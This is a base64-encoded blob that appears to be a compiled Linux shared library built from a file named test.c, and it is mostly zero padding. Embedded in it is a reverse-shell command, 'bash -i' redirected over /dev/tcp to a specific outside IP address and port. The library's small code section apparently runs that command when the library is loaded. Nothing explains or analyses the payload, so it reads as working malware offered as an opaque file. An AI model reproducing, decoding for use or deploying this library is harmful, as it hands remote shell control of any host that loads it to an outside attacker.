AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPMPHvpIg+wISIsFwS8AAEiFwHQC/9BIg8QIwwAAAAAA/zXKLwAA/yXMLwAADx9AAP8lyi8AAGgAAAAA6eD///9IjT3JLwAASI0Fwi8AAEg5+HQVSIsFbi8AAEiFwHQJ/+APH4AAAAAAww8fgAAAAABIjT2ZLwAASI01ki8AAEgp/kiJ8EjB7j9IwfgDSAHGSNH+dBRIiwU9LwAASIXAdAj/4GYPH0QAAMMPH4AAAAAA8w8e+oA9VS8AAAB1M1VIgz0aLwAAAEiJ5XQNSIs9Ni8AAP8VCC8AAOhj////xgUsLwAAAV3DZi4PH4QAAAAAAMNmZi4PH4QAAAAAAA8fQADzDx766Wf///9VSInlSI0F7A4AAEiJx+gU////kF3DAPMPHvpIg+wISIPECMMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABiYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzQzLjEzNy40OS41Mi8xOTEzNCAwPiYxJyAmAAEbAzscAAAAAgAAAOjv//84AAAA0fD//2AAAAAAAAAAFAAAAAAAAAABelIAAXgQARsMBwiQAQAAJAAAABwAAACo7///IAAAAAAOEEYOGEoPC3cIgAA/GjsqMyQiAAAAABwAAABEAAAAafD//xYAAAAAQQ4QhgJDDQZRDAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAALAQAAAAAAAAAQAAAAAAAABhAAAAAAAAAAwAAAAAAAAAABAAAAAAAAANAAAAAAAAACARAAAAAAAAGQAAAAAAAADwPQAAAAAAABsAAAAAAAAAEAAAAAAAAAAaAAAAAAAAAAA+AAAAAAAAHAAAAAAAAAAIAAAAAAAAAPX+/28AAAAAAAMAAAAAAAAFAAAAAAAAANADAAAAAAAABgAAAAAAAAAoAwAAAAAAAAoAAAAAAAAAdwAAAAAAAAALAAAAAAAAABgAAAAAAAAAAwAAAAAAAADoPwAAAAAAAAIAAAAAAAAAGAAAAAAAAAAUAAAAAAAAAAcAAAAAAAAAFwAAAAAAAAA4BQAAAAAAAAcAAAAAAAAAeAQAAAAAAAAIAAAAAAAAAMAAAAAAAAAACQAAAAAAAAAYAAAAAAAAAP7//28AAAAAWAQAAAAAAAD///9vAAAAAAEAAAAAAAAA8P//bwAAAABIBAAAAAAAAPn//28AAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACD4AAAAAAAAAAAAAAAAAAAAAAAAAAAAANhAAAAAAAAAIQAAAAAAAAEdDQzogKEdOVSkgMTMuMi4xIDIwMjMwODAxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAAAAAAAAQA8f8AAAAAAAAAAAAAAAAAAAAACAAAAAIADQAgEQAAAAAAAAAAAAAAAAAADgAAAAEAFgAIQAAAAAAAAAAAAAAAAAAAGwAAAAEAEwAIPgAAAAAAAAAAAAAAAAAAJAAAAAAADwA4IAAAAAAAAAAAAAAAAAAANwAAAAEAFgAQQAAAAAAAAAAAAAAAAAAAQwAAAAEAFQDoPwAAAAAAAAAAAAAAAAAAWQAAAAIACgAAEAAAAAAAAAAAAAAAAAAAXwAAACAAAAAAAAAAAAAAAAAAAAAAAAAAewAAABIAAAAAAAAAAAAAAAAAAAAAAAAAjgAAACAAAAAAAAAAAAAAAAAAAAAAAAAAnQAAACAAAAAAAAAAAAAAAAAAAAAAAAAAtwAAACIAAAAAAAAAAAAAAAAAAAAAAAAA0gAAABIADAAJEQAAAAAAABYAAAAAAAAAAHRlc3QuYwBfZmluaQBfX2Rzb19oYW5kbGUAX0RZTkFNSUMA